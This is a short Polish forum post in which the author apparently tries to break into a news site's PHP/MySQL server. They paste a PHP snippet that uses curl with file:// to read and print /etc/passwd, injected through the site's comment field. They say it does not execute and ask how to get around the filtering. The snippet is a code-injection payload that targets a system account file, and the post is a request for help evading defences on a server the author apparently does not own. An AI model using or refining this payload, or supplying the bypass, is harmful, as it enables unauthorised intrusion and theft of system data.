Witam - mam pytanie czy można wyciągnąć hasła z passwd za pomocą tego skrypciku:

Kod:
<?php
$ch = curl_init("file:///etc/passwd");
$file=curl_exec($ch);
echo $file
?>
jest serwerek (php+mysql) i zwykły system newsów w którym poprzez pole textera dodaje sie komentarz na stronkę, system ten działa pod mysql-em - jak dodaje newsa z w/w kodem nic się nie wyświetla - a wiem że serwer jest podatny ta w/w dziure - problem w tym ze mysql nie przepuszcza skryptu czy można jakoś ominąć to ?